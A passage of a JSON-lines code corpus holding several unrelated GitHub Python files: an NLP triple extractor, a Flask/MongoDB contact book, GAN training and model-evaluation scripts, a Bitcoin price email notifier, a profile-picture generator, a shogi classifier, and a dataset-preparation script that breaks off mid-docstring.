+{"seq_id":"71359331886","text":"from nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nstopwords = set(stopwords.words('english'))\n\nimport verb_net_reader\nimport file_tools\n\nxmlPath = \"../../../data/xml/\"\n\ndebug = True\ndebugXML = False\n\n\ndef getSPOTuples(xmlRoot):\n subjects = []\n predicates = []\n objects = []\n\n for sentenceNode in xmlRoot.find('document').find('sentences').findall('sentence'):\n for openie in sentenceNode.findall('openie'):\n for tripleNode in openie.findall('triple'):\n subjectNode = tripleNode.find('subject')\n predNode = tripleNode.find('relation')\n objectNode = tripleNode.find('object')\n\n subjects.append(subjectNode.find('text').text)\n predicates.append(predNode.find('text').text)\n objects.append(objectNode.find('text').text)\n\n return subjects, predicates, objects\n\n\ndef listTokenFrequencies(tokenList):\n if tokenList is None:\n return\n\n freqDict = {}\n\n for token in tokenList:\n if freqDict.get(token) is None:\n freqDict[token] = 1\n else:\n freqDict[token] += 1\n\n print(freqDict)\n\n\ndef getPoliticianOccurances(tokenList):\n trumpTripleIndices = []\n clintonTripleIndices = []\n\n for i in range(len(tokenList)):\n text = tokenList[i]\n if 'Trump' in text or 'Donald' in text:\n trumpTripleIndices.append(i)\n elif 'Clinton' in text or 'Hillary' in text:\n clintonTripleIndices.append(i)\n\n print(\"Trump: \", len(trumpTripleIndices), \"Clinton:\", len(clintonTripleIndices))\n return trumpTripleIndices, clintonTripleIndices\n\ndef getTokensFromList(indicesToExtract, textList):\n tokens = []\n for i in indicesToExtract:\n for token in word_tokenize(textList[i]):\n token = token.lower()\n if token not in stopwords:\n tokens.append(token)\n return tokens\n\n\ndef doSvoAnalysis(fileName):\n root = file_tools.getXMLRoot(fileName)\n subjects, predicates, objects = getSPOTuples(root)\n \n if(debugXML):\n print(subjects)\n print(predicates)\n print(objects)\n \n indicesOfTrumpSubs, indicesOfClintonSubs = getPoliticianOccurances(subjects)\n getPoliticianOccurances(predicates)\n getPoliticianOccurances(objects)\n \n trumpPreds = []\n trumpObjs = []\n trumpSubjs = []\n \n print('\\nTrump Triples:')\n for tripleIndex in indicesOfTrumpSubs:\n print(subjects[tripleIndex], '|', predicates[tripleIndex], '|', objects[tripleIndex])\n trumpPreds.append(predicates[tripleIndex])\n trumpObjs.append(objects[tripleIndex])\n trumpSubjs.append(subjects[tripleIndex])\n\n # # Print out the frequencies of tokens that occur as predicates when Trump occurs in the subject\n # print('Trump Predicate Frequencies:')\n # print(listTokenFrequencies(getTokensFromList(indicesOfTrumpSubs, predicates)))\n # # Print out the frequencies of tokens that occur as objects when Trump occurs in the subject\n # print('Trump Object Frequencies:')\n # print(listTokenFrequencies(getTokensFromList(indicesOfTrumpSubs, objects)))\n \n \n # Do the same thing for Clinton TODO: Extract this to a function\n clintonPreds = []\n clintonObjs = []\n clintonSubjs = []\n print('\\nClinton Triples:')\n for tripleIndex in indicesOfClintonSubs:\n print(subjects[tripleIndex], '|', predicates[tripleIndex], '|', objects[tripleIndex])\n clintonPreds.append(predicates[tripleIndex])\n clintonObjs.append(objects[tripleIndex])\n clintonSubjs.append(subjects[tripleIndex])\n\n return (trumpSubjs, trumpPreds, trumpObjs, clintonSubjs, clintonPreds, clintonObjs)\n\n # # Print out the frequencies of tokens that occur as predicates when Clinton occurs in the subject\n # print('Clinton Predicate Frequencies:')\n # print(listTokenFrequencies(getTokensFromList(indicesOfClintonSubs, predicates)))\n # # Print out the frequencies of tokens that occur as objects when Clinton occurs in the subject\n # print('Clinton Object Frequencies:')\n # print(listTokenFrequencies(getTokensFromList(indicesOfClintonSubs, objects)))\n\n\nif __name__ == '__main__':\n # Store verbnet xml in usable python dict format\n print('--- Reading verbnet files ---')\n verbNet = verb_net_reader.VerbNet()\n verbNet.readVerbnetFiles()\n verbNet.print()\n print()\n\n xmlFiles = file_tools.getFilesFrom(xmlPath)\n print(xmlFiles)\n for file in xmlFiles:\n doSvoAnalysis(xmlPath + file)","repo_name":"alex-calderwood/msu-data-mining-project","sub_path":"svo/corenlp/python/svo_xml.py","file_name":"svo_xml.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"27725609890","text":"import sys\r\nimport torch\r\nimport random\r\nfrom datetime import datetime\r\nimport numpy as np\r\nimport csv\r\n\r\n\r\ncsv.field_size_limit(sys.maxsize)\r\n\r\ndef setup_seed(seed, cuda_deterministic=True):\r\n random.seed(seed)\r\n np.random.seed(seed)\r\n\r\n torch.manual_seed(seed)\r\n torch.cuda.manual_seed_all(seed)\r\n if cuda_deterministic: # slower, more reproducible\r\n torch.backends.cudnn.deterministic = True\r\n torch.backends.cudnn.benchmark = False\r\n else: # faster, less reproducible\r\n torch.backends.cudnn.deterministic = False\r\n torch.backends.cudnn.benchmark = True\r\n\r\n\r\ndef format_time():\r\n return datetime.now().strftime('%Y-%m-%d %H:%M:%S | ')\r\n\r\n\r\ndef load_tsv(input_file, quotechar=None):\r\n \"\"\"Reads a tab separated value file.\"\"\"\r\n with open(input_file, \"r\", encoding=\"utf-8\") as f:\r\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\r\n lines = []\r\n for line in reader:\r\n if sys.version_info[0] == 2:\r\n line = list(unicode(cell, 'utf-8') for cell in line)\r\n lines.append(line)\r\n return lines\r\n\r\n\r\ndef remove_multiple_strings(cur_string, replace_list):\r\n for cur_word in replace_list:\r\n cur_string = cur_string.replace(cur_word, '')\r\n return cur_string\r\n","repo_name":"Cyril-JZ/InteR","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"2"}
+{"seq_id":"2304660570","text":"from flask import Flask,render_template,flash,redirect,url_for,session,logging,request\r\nfrom flask_pymongo import PyMongo\r\nfrom bson.objectid import ObjectId\r\n\r\napp = Flask(__name__)\r\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/RehberUygulama\" \r\nmongo = PyMongo(app)\r\n\r\n\r\n\r\n# Index Sayfası Ve Rehberdeki Kisileri Listeleme\r\n@app.route(\"/\")\r\ndef index():\r\n name = mongo.db.Rehber.find()\r\n count = mongo.db.Rehber.count()\r\n return render_template(\"index.html\",name = name,count = count)\r\n\r\n\r\n\r\n# Yeni Kisi Ekle Sayfası Get Islemi\r\n@app.route(\"/createPage\")\r\ndef createPage():\r\n return render_template(\"createPage.html\") \r\n\r\n# Yeni Kisi Ekleme Islemi\r\n@app.route(\"/create\",methods=[\"POST\"])\r\ndef create():\r\n name = request.form.get(\"name\")\r\n email = request.form.get(\"email\")\r\n phonenumber = request.form.get(\"phonenumber\")\r\n person = mongo.db.Rehber.insert({\"Name\": name, \"Email\": email, \"PhoneNumber\": phonenumber})\r\n return redirect(url_for(\"index\"))\r\n\r\n\r\n\r\n# Kisi Oku Sayfasina Verilerin Gonderilmesi\r\n@app.route(\"/readPage/\")\r\ndef readPage(Name):\r\n person = mongo.db.Rehber.find_one_or_404({\"_id\": ObjectId(Name)})\r\n return render_template(\"readPage.html\",person = person)\r\n\r\n\r\n\r\n# Kisi Guncelle Sayfasi Veriyi Gonderme\r\n@app.route(\"/updatePage/\")\r\ndef updatePage(Name):\r\n person = mongo.db.Rehber.find_one_or_404({\"_id\": ObjectId(Name)})\r\n return render_template(\"updatePage.html\",person = person)\r\n\r\n# Kisi Guncelleme Islemi\r\n@app.route(\"/update/\",methods=[\"POST\"])\r\ndef update(Name):\r\n name = request.form.get(\"name\")\r\n email = request.form.get(\"email\")\r\n phonenumber = request.form.get(\"phonenumber\")\r\n myquery = { \"_id\" : ObjectId(Name) }\r\n newValues = { \"$set\": { \"Name\": name, \"Email\": email, \"PhoneNumber\": phonenumber}} \r\n person = mongo.db.Rehber.update_one(myquery,newValues)\r\n return redirect(url_for(\"index\"))\r\n\r\n\r\n\r\n# Delete Sayfasi Ve Silinecek Kisi Bilgilerinin Gosterilmesi\r\n@app.route(\"/deletePage/\")\r\ndef deletePage(Name):\r\n person = mongo.db.Rehber.find_one_or_404({ \"_id\": ObjectId(Name)})\r\n return render_template(\"deletePage.html\",person = person) \r\n\r\n# Kisi Silme Islemi\r\n@app.route(\"/delete/\") \r\ndef delete(Name):\r\n person = mongo.db.Rehber.delete_one( {\"_id\": ObjectId(Name)})\r\n return redirect(url_for(\"index\"))\r\n\r\n\r\n \r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","repo_name":"berkekurnaz/Flask_Framework_Ornekler","sub_path":"4_Flask_MongoDb_Crud_Islemleri/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"39457522939","text":"import time\nfrom options.train_options import TrainOptions\nfrom data import CreateDataLoader\nfrom models import create_model\nfrom util.visualizer import Visualizer\nfrom util.summary import Logger\nimport tensorflow as tf\n\nif __name__ == '__main__':\n\topt = TrainOptions().parse()\n\tdata_loader = CreateDataLoader(opt)\n\tdataset = data_loader.load_data()\n\tdataset_size = len(data_loader)\n\tprint('#training images = %d' % dataset_size)\n\n\tmodel = create_model(opt)\n\tmodel.setup(opt)\n\t# visualizer = Visualizer(opt)\n\n\t# Create summary writer\n\tlogger = Logger(opt)\n\ttags = ['D_A', 'G_A', 'cycle_A', 'idt_A', 'D_B', 'G_B', 'cycle_B', 'idt_B']\n\t# loss_sum = dict.fromkeys(tags, 0)\n\t# loss_avg = dict.fromkeys(tags, 0)\n\n\ttotal_steps = 0\n\tfor epoch in range(opt.epoch_count, opt.niter + opt.niter_decay + 1):\n\t\tepoch_start_time = time.time()\n\t\titer_data_time = time.time()\n\t\tepoch_iter = 0\n\n\t\tfor i, data in enumerate(dataset):\n\t\t\titer_start_time = time.time()\n\t\t\tif total_steps % opt.print_freq == 0:\n\t\t\t\tt_data = iter_start_time - iter_data_time\n\t\t\t# visualizer.reset()\n\t\t\ttotal_steps += opt.batchSize\n\t\t\tepoch_iter += opt.batchSize\n\t\t\tmodel.set_input(data)\n\t\t\tmodel.optimize_parameters()\n\n\t\t\t# losses = model.get_current_losses()\n\t\t\t# for tag in tags:\n\t\t\t# \tloss_sum[tag] += losses[tag]\n\t\t\t# \tloss_avg[tag] = loss_sum[tag] / total_steps\n\n\t\t\tif total_steps % opt.display_freq == 0:\n\t\t\t\tsave_result = total_steps % opt.update_html_freq == 0\n\t\t\t\t# visualizer.display_current_results(model.get_current_visuals(), epoch, save_result)\n\n\t\t\tif total_steps % opt.print_freq == 0:\n\t\t\t\tlosses = model.get_current_losses()\n\t\t\t\tt = (time.time() - iter_start_time) / opt.batchSize\n\n\t\t\t\tprint ('step %d, cost %.3f secs, D_A:%.3f, G_A:%.3f, cycle_A:%.3f, idt_A:%.3f, D_B:%.3f, G_B:%.3f, cycle_B:%.3f, idt_B:%.3f ' %\n\t\t\t\t (total_steps, t, losses['D_A'], losses['G_A'], losses['cycle_A'], losses['idt_A'], losses['D_B'], losses['G_B'], losses['cycle_B'], losses['idt_B'] ))\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tfor tag in tags:\n\t\t\t\t\tlogger.scalar_summary(tag, losses[tag], total_steps)\n\t\t\t\t\t\n\t\t\t\t# visualizer.print_current_losses(epoch, epoch_iter, losses, t, t_data)\n\t\t\t\t# if opt.display_id > 0:\n\t\t\t\t\t# visualizer.plot_current_losses(epoch, float(epoch_iter) / dataset_size, opt, losses)\n\n\t\t\tif total_steps % opt.save_latest_freq == 0:\n\t\t\t\tprint('saving the latest model (epoch %d, total_steps %d)' %\n\t\t\t\t\t (epoch, total_steps))\n\t\t\t\tmodel.save_networks('latest')\n\n\t\t\titer_data_time = time.time()\n\t\tif epoch % opt.save_epoch_freq == 0:\n\n\t\t\t# print ('Average loss: D_A:%.3f, G_A:%.3f, cycle_A:%.3f, idt_A:%.3f, D_B:%.3f, G_B:%.3f, cycle_B:%.3f, idt_B:%.3f ' %\n\t\t\t# \t (total_steps, t, loss_avg['D_A'], loss_avg['G_A'], loss_avg['cycle_A'], loss_avg['idt_A'], loss_avg['D_B'], loss_avg['G_B'], loss_avg['cycle_B'], loss_avg['idt_B'] ))\n\t\t\t\t\n\t\t\tprint('saving the model at the end of epoch %d, iters %d' %\n\t\t\t\t (epoch, total_steps))\n\t\t\tmodel.save_networks('latest')\n\t\t\tmodel.save_networks(epoch)\n\n\t\tprint('End of epoch %d / %d \\t Time Taken: %d sec' %\n\t\t\t (epoch, opt.niter + opt.niter_decay, time.time() - epoch_start_time))\n\t\tmodel.update_learning_rate()\n","repo_name":"Alexis97/Pet-Hair-Color-Transfer","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"2415346001","text":"#!/usr/bin/python\n\n#import libraries\nimport sys\nimport os\nimport time\nimport ConfigParser\nimport urllib2\nimport smtplib\nimport getpass\nfrom socket import gaierror\nfrom socket import error as socketerror\nfrom email.mime.text import MIMEText\n\n\nclass BTCtxtError(Exception):\n def __init__(self, message, cause):\n super(BTCtxtError, self).__init__('{}, caused by {}'.format(message, repr(cause)))\n self.cause = cause\n\n\nclass UnknownError(Exception):\n def __init__(self, message):\n super(UnknownError, self).__init__('{}, caused by {}'.format(message, repr(sys.exc_info()[1])))\n\n\nclass ParserError(Exception):\n pass\n\n\nclass BTCtxt:\n def __init__(self):\n self.last = 1\n self.from_address = \"\"\n self.smtp = \"\"\n self.port = \"\"\n self.to_address = \"\"\n self.user = \"\"\n self.pw = \"\"\n self.ratio = []\n self.sleeptime = []\n self.currency = \"\"\n return None\n\n def monitor(self):\n url = \"https://api.bitcoinaverage.com/ticker/global/\" + btctxt.currency + \"/last\"\n #get current price\n try:\n current = float(urllib2.urlopen(url).read())\n except(urllib2.HTTPError) as e:\n raise BTCtxtError(\"Invalid URL: {}\".format(url), e)\n else:\n #compare current to log price\n change = abs((btctxt.last-current)/current)\n if change > btctxt.ratio:\n try:\n btctxt.send_email(current)\n except smtplib.SMTPAuthenticationError as e:\n raise BTCtxtError('Email log-in failed', e)\n except gaierror as e:\n raise BTCtxtError('Invalid server {}'.format(self.smtp), e)\n except socketerror as e:\n raise BTCtxtError('Invalid (server, port): ({}, {})'.format(self.smtp, self.port), e)\n except Exception:\n raise UnknownError('Something went wrong sending your message... bummer. Please raise an issue on git at dougmercer/btctxt')\n else:\n btctxt.last = current\n return self\n\n def send_email(self, current):\n msg = self._write_email(current)\n #start server\n try:\n server = smtplib.SMTP(self.smtp, self.port, None, 30)\n server.ehlo()\n server.starttls()\n server.login(self.user, self.pw)\n server.sendmail(self.from_address, [self.to_address], msg.as_string())\n finally:\n server.close()\n\n def _write_email(self, current):\n #Format email_content\n timestr = time.strftime(\"%H:%M\", time.localtime())\n email_content = \"The price of BTC is currently \" + str(current) + self.currency + \" as of \" + timestr + \".\"\n #Create msg\n msg = MIMEText(email_content)\n msg['Subject'] = \"BTCtxt\"\n msg['To'] = self.to_address\n msg['From'] = self.from_address\n return msg\n\n\ndef get_conf(path):\n parser = ConfigParser.RawConfigParser()\n parser.read(path)\n necessary = [\"smtp\", \"port\", \"to\", \"from\"]\n optional = [\"currency\", \"sleeptime\", \"ratio\"]\n #check necessary\n for item in necessary:\n if item not in parser.options(\"Necessary\"):\n raise ParserError(\"Please include a {} entry in the [Necessary] section.\".format(item))\n #check optional\n for item in optional:\n if item not in parser.options(\"Optional\"):\n if item is \"currency\":\n parser.set(\"Optional\", item, \"USD\")\n elif item is \"sleeptime\":\n parser.set(\"Optional\", item, \"180\")\n elif item is \"ratio\":\n parser.set(\"Optional\", item, \"0.075\")\n return parser\n\n\nif __name__ == '__main__':\n #Create instance of btctxt class\n btctxt = BTCtxt()\n #Populate btctxt attributes using one of three input methods\n if len(sys.argv) == 2:\n #if only path to .conf file provided\n #read .conf\n parser = get_conf(sys.argv[1])\n #write .conf to btctxt\n btctxt.from_address = parser.get(\"Necessary\", \"from\")\n btctxt.smtp = parser.get(\"Necessary\", \"smtp\")\n btctxt.port = parser.get(\"Necessary\", \"port\")\n btctxt.to_address = parser.get(\"Necessary\", \"to\")\n btctxt.ratio = float(parser.get(\"Optional\", \"ratio\"))\n btctxt.sleep_time = float(parser.get(\"Optional\", \"sleeptime\"))\n btctxt.currency = parser.get(\"Optional\", \"currency\")\n #get user and pw from std in\n btctxt.user = raw_input(\"Username: \")\n btctxt.pw = getpass.getpass()\n elif len(sys.argv) == 3 and sys.argv[2] is \"c\":\n #if path to .conf file and letter c provided as second argument\n #read .conf\n parser = get_conf(sys.argv[1])\n #write .conf to btctxt\n btctxt.from_address = parser.get(\"Necessary\", \"from\")\n btctxt.smtp = parser.get(\"Necessary\", \"smtp\")\n btctxt.port = parser.get(\"Necessary\", \"port\")\n btctxt.to_address = parser.get(\"Necessary\", \"to\")\n btctxt.ratio = float(parser.get(\"Optional\", \"ratio\"))\n btctxt.sleep_time = float(parser.get(\"Optional\", \"sleeptime\"))\n btctxt.currency = parser.get(\"Optional\", \"currency\")\n btctxt.user = parser.get(\"Credentials\", \"user\")\n btctxt.pw = parser.get(\"Credentials\", \"pw\")\n else:\n #read stdin\n btctxt.from_address = sys.argv[1]\n btctxt.smtp = sys.argv[2]\n btctxt.port = sys.argv[3]\n btctxt.to_address = sys.argv[4]\n btctxt.user = sys.argv[5]\n btctxt.pw = sys.argv[6]\n btctxt.ratio = float(sys.argv[7])\n btctxt.sleep_time = float(sys.argv[8])\n btctxt.currency = sys.argv[9]\n while True:\n btctxt = btctxt.monitor()\n time.sleep(btctxt.sleep_time)\n","repo_name":"jarbanas/btctxt","sub_path":"btctxt.py","file_name":"btctxt.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"71562748845","text":"import os\nimport argparse\nimport pickle\nimport torch\n\n# Data\nfrom pixelflow.data import CategoricalCIFAR10\nfrom pixelflow.data.utils import DEFAULT_PATH\nLOG_FOLDER = os.path.join(os.path.dirname(DEFAULT_PATH), 'experiments/log')\nCHECK_FOLDER = os.path.join(os.path.dirname(DEFAULT_PATH), 'experiments/check')\n\n\ndef dataset_elbo_bpd(model, data_loader, device, double):\n with torch.no_grad():\n bpd = 0.0\n count = 0\n for i, (batch, _) in enumerate(data_loader):\n if double: batch = batch.double()\n bpd += model.elbo_bpd(batch.to(device)).cpu().item() * len(batch)\n count += len(batch)\n print('{}/{}'.format(i+1, len(data_loader)), bpd/count, end='\\r')\n return bpd / count\n\n\ndef dataset_iwbo_bpd(model, data_loader, device, double, k, batch_size=None):\n with torch.no_grad():\n bpd = 0.0\n count = 0\n for i, (batch, _) in enumerate(data_loader):\n if double: batch = batch.double()\n bpd += model.iwbo_bpd(batch.to(device), k=k, batch_size=batch_size).cpu().item() * len(batch)\n count += len(batch)\n print('{}/{}'.format(i+1, len(data_loader)), bpd/count, end='\\r')\n return bpd / count\n\n\ndef eval_elbo(create_model_fn):\n\n parser = argparse.ArgumentParser()\n\n # Training args\n parser.add_argument('--model_path', type=str)\n parser.add_argument('--device', type=str, default='cuda')\n parser.add_argument('--batch_size', type=int, default=100)\n parser.add_argument('--test_set', type=eval, default=True)\n parser.add_argument('--double', type=eval, default=False)\n parser.add_argument('--k', type=int, default=None)\n\n eval_args = parser.parse_args()\n\n if eval_args.k is None:\n batch_size = eval_args.batch_size\n iwbo_batch_size = None\n elif eval_args.k <= eval_args.batch_size:\n assert eval_args.batch_size % eval_args.k == 0\n batch_size = eval_args.batch_size // eval_args.k\n iwbo_batch_size = None\n else:\n assert eval_args.k % eval_args.batch_size == 0\n batch_size = 1\n iwbo_batch_size = eval_args.batch_size\n model_log = os.path.join(LOG_FOLDER, eval_args.model_path)\n model_check = os.path.join(CHECK_FOLDER, eval_args.model_path)\n\n with open('{}/args.pickle'.format(model_log), 'rb') as f:\n args = pickle.load(f)\n\n ##################\n ## Specify data ##\n ##################\n\n torch.manual_seed(0)\n\n data = CategoricalCIFAR10()\n\n if eval_args.test_set:\n data_loader = torch.utils.data.DataLoader(data.test, batch_size=batch_size)\n else:\n data_loader = torch.utils.data.DataLoader(data.train, batch_size=batch_size)\n test_str = 'test' if eval_args.test_set else 'train'\n\n ################\n ## Load model ##\n ################\n\n model = create_model_fn(args)\n\n # Load pre-trained weights\n weights = torch.load('{}/model.pt'.format(model_check), map_location='cpu')\n model.load_state_dict(weights, strict=False)\n model = model.to(eval_args.device)\n model = model.eval()\n if eval_args.double: model = model.double()\n double_str = '_double' if eval_args.double else ''\n\n ####################\n ## Compute loglik ##\n ####################\n\n if eval_args.k is None:\n # Compute ELBO\n elbo = dataset_elbo_bpd(model, data_loader, device=eval_args.device, double=eval_args.double)\n print('Done, ELBO: {}'.format(elbo))\n fname = '{}/elbo_bpd_{}{}.txt'.format(model_log, test_str, double_str)\n with open(fname, \"w\") as f:\n f.write(str(elbo))\n else:\n iwbo = dataset_iwbo_bpd(model, data_loader, device=eval_args.device, double=eval_args.double, k=eval_args.k, batch_size=iwbo_batch_size)\n print('Done, IWBO({}): {}'.format(eval_args.k, iwbo))\n fname = '{}/iwbo{}_bpd_{}{}.txt'.format(model_log, eval_args.k, test_str, double_str)\n with open(fname, \"w\") as f:\n f.write(str(iwbo))\n","repo_name":"didriknielsen/pixelcnn_flow","sub_path":"experiments/eval/bpd/_eval_elbo.py","file_name":"_eval_elbo.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"2"}
+{"seq_id":"35433428289","text":"import png_lib\nfrom random import randint\n\n\n\n#https://stackoverflow.com/a/43235/7018899\ndef random_color(color_mask = None):\n r = randint(0, 255)\n g = randint(0, 255)\n b = randint(0, 255)\n if color_mask:\n r = int((r + color_mask[0])/2)\n g = int((g + color_mask[0])/2)\n b = int((b + color_mask[0])/2)\n return (r, g, b)\n\ndef gen_profile_pic(width, height, color_mask=None, background=(0, 0, 0, 0), \n color_probability = 50):\n png_data = []\n color = (*random_color(color_mask), 255)\n mid_index = (width - 1)/2\n for i in range(height):\n png_data.append([])\n for j in range(width):\n if j < width/2:\n if randint(0, 99) < color_probability:\n png_data[i].append(color)\n else:\n png_data[i].append(background)\n else:\n png_data[i].append(png_data[i][int(2 * mid_index - j)])\n profile_pic = png_lib.png(data = png_data)\n #import pdb;pdb.set_trace()\n return profile_pic\n\ndef gen_filenames(quantity):\n from uuid import uuid4\n filenames = []\n for i in range(quantity):\n filenames.append(\"picgen_\" + str(uuid4().hex) + \".png\")\n return filenames\n\ndef main():\n from sys import argv\n from os import makedirs, path\n dir = \"tmp_profile_pic\"\n makedirs(dir, exist_ok = True)\n try:\n filenames = gen_filenames(int(argv[1]))\n except IndexError:\n filenames = gen_filenames(5)\n for filename in filenames:\n filename = path.join(dir, filename)\n profile_pic = gen_profile_pic(12, 12, (255, 255, 255), \n (255, 255, 255, 255), 40)\n profile_pic.enlarge_pixel_data(16)\n profile_pic.smart_create(filename = filename)\n \n print(\"created %d png(s)\" % len(filenames))\n\n\nif __name__==\"__main__\":\n main()","repo_name":"09milk/profile_picture_generator","sub_path":"profile_picture_generator.py","file_name":"profile_picture_generator.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31725421818","text":"from dataclasses import InitVar, dataclass, field\nfrom typing import Any, Final, List\n\nimport numpy as np\nimport numpy.typing as npt\nimport torch\nimport torchvision\nfrom torch import nn\nfrom torchvision import models, transforms\n\nCLASSES: Final[List[str]] = sorted(\n [\n \"-01\",\n \"-02\",\n \"-03\",\n \"-04\",\n \"-05\",\n \"-06\",\n \"-07\",\n \"-08\",\n \"-09\",\n \"-10\",\n \"-11\",\n \"-12\",\n \"-13\",\n \"-14\",\n \"00\",\n \"01\",\n \"02\",\n \"03\",\n \"04\",\n \"05\",\n \"06\",\n \"07\",\n \"08\",\n \"09\",\n \"10\",\n \"11\",\n \"12\",\n \"13\",\n \"14\",\n ]\n)\n\nIntegerArrayType: Final[Any] = npt.NDArray[np.int_]\nDeviceType: Final[Any] = torch._C.device\nTransformType: Final[Any] = transforms.Compose\nModelType: Final[Any] = torchvision.models.densenet161\nTensorType: Final[Any] = torch.Tensor\n\n\n@dataclass\nclass ShogiModel:\n device: DeviceType = field(init=False)\n transform: TransformType = field(init=False)\n model: ModelType = field(init=False)\n model_path: InitVar[str] = field(default=\"../models/model.pth\")\n\n def __post_init__(self, model_path):\n self.device = torch.device(\n \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n )\n self.transform = transforms.Compose(\n [\n transforms.ToPILImage(),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ]\n )\n self.model = models.densenet161()\n self.model.classifier = nn.Linear(\n self.model.classifier.in_features, len(CLASSES)\n )\n self.model = self.model.to(device=self.device)\n self.model.load_state_dict(\n torch.load(model_path, map_location=self.device)\n )\n\n def predict(self, images: IntegerArrayType) -> IntegerArrayType:\n results: IntegerArrayType = np.array([])\n self.model.eval()\n with torch.no_grad():\n for image in images:\n inputs: TensorType = (\n self.transform(image).unsqueeze(0).to(self.device)\n )\n outputs: TensorType = self.model(inputs)\n predicted: TensorType = torch.max(outputs, 1)[1]\n results = np.append(results, int(CLASSES[predicted]))\n return results.reshape(9, 9).astype(np.int32)\n","repo_name":"Futaba-Kosuke/shogi-camera-server","sub_path":"classify_shogi_piece/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"10032064859","text":"import os\r\nimport csv\r\nimport warnings\r\nimport numpy as np\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport DatasetUtil as datasetUtil\r\n\r\nfrom sklearn import metrics\r\nfrom sklearn.utils import shuffle\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import SGDRegressor\r\nfrom sklearn.linear_model import SGDRegressor\r\nfrom sklearn.kernel_ridge import KernelRidge\r\nfrom sklearn.linear_model import ElasticNet\r\nfrom sklearn.linear_model import BayesianRidge\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\nfrom sklearn.svm import SVR\r\n\r\n\r\ndef preConditions(dataset):\r\n \"\"\"\r\n Verificarea folosirii tensorflow GPU, pentru o antrenare mai rapida se va folosi GPU, in locul CPU-ului.\r\n :param dataset: Setul de date actual\r\n :return: Afiseaza daca Tensorflow GPU este activat sau nu. Afiseaza primele 5 randuri din setul de date.\r\n \"\"\"\r\n warnings.filterwarnings(\"ignore\", category=np.VisibleDeprecationWarning)\r\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\n os.environ[\"PATH\"] += os.pathsep + 'C:/Program Files/Graphviz/bin/'\r\n\r\n if tf.test.gpu_device_name():\r\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\r\n else:\r\n print(\"Please install GPU version of TF\")\r\n print(\"----- PRIMELE 5 VALORI DIN SETUL DE DATE ----- \")\r\n print(dataset.head())\r\n\r\n\r\ndef deserializeMainDataset(dataset):\r\n \"\"\"\r\n Se deserializeaza setul de date, valorile din csv fiind in bytecode -> se transforma in valori de tip float.\r\n :param dataset: Setul de date, valori in bytecode.\r\n :return: Setul de date in valori de tip float.\r\n \"\"\"\r\n deserializedDataset = datasetUtil.deserializeDataset(dataset)\r\n print(\"----- AFTER THE DESERIALIZATION OF THE DATASET -----\")\r\n for i in range(5):\r\n print(deserializedDataset[i])\r\n\r\n return deserializedDataset\r\n\r\n\r\ndef reformatTheDataset(dataset):\r\n \"\"\"\r\n Pentru a intra in input layer-ul retelei neuronale, coeficientii dependenti si independeti trebuie restructurati.\r\n :param dataset: Setul de date care contine coeficientii dependenti, independenti si solutiile in valor de tip float.\r\n :return: Coeficientii dependenti si independenti refactorizati si stocati in X, iar Solutiile (valorile care trebuie\r\n aflate) sunt stocate in Y.\r\n \"\"\"\r\n sys = [datasetUtil.reformatList(list(row[0])) for row in dataset]\r\n sol = [list(row[1]) for row in dataset]\r\n X = datasetUtil.createX(sys, sol)\r\n Y = [row[2].astype(\"float32\") for row in dataset]\r\n X = np.array([np.array(val) for val in X])\r\n Y = np.array([np.array(val) for val in Y])\r\n\r\n return X, Y\r\n\r\n\r\ndef NormalizeDataSklearn(X, Y, revertBoolean=False):\r\n \"\"\"\r\n In cazul in care in sisteme sunt prezenti coeficienti care au valori mari:\r\n Normalizarea valorilor sistemului intre [0,1] pentru o antrenare mai usoara.\r\n :param X: Coeficientii sistemului patratic [2x2].\r\n :param Y: Necunoscutele sistemului.\r\n :param revertBoolean: false daca se doreste normalizarea, true daca se doreste inversarea acestei transformari,\r\n adica aducerea inapoi la forma originala a valorilor.\r\n :return: (Coeficientii dependenti / Coeficientii independenti normalizati) -> X / (Necunoscutele) - > Y\r\n \"\"\"\r\n min_max_scaler = MinMaxScaler(feature_range=(0, 1))\r\n if not revertBoolean:\r\n X_norm = min_max_scaler.fit_transform(X)\r\n Y_norm = min_max_scaler.transform(Y)\r\n return X_norm, Y_norm\r\n else:\r\n X = min_max_scaler.inverse_transform(X)\r\n Y = min_max_scaler.inverse_transform(Y)\r\n return X, Y\r\n\r\n\r\ndef spiltDatasetIntoTrainTest(X, Y):\r\n \"\"\"\r\n Se formeaza si se imparte setul de date pentru a putea fi antrenate pe modelul neuronal.\r\n 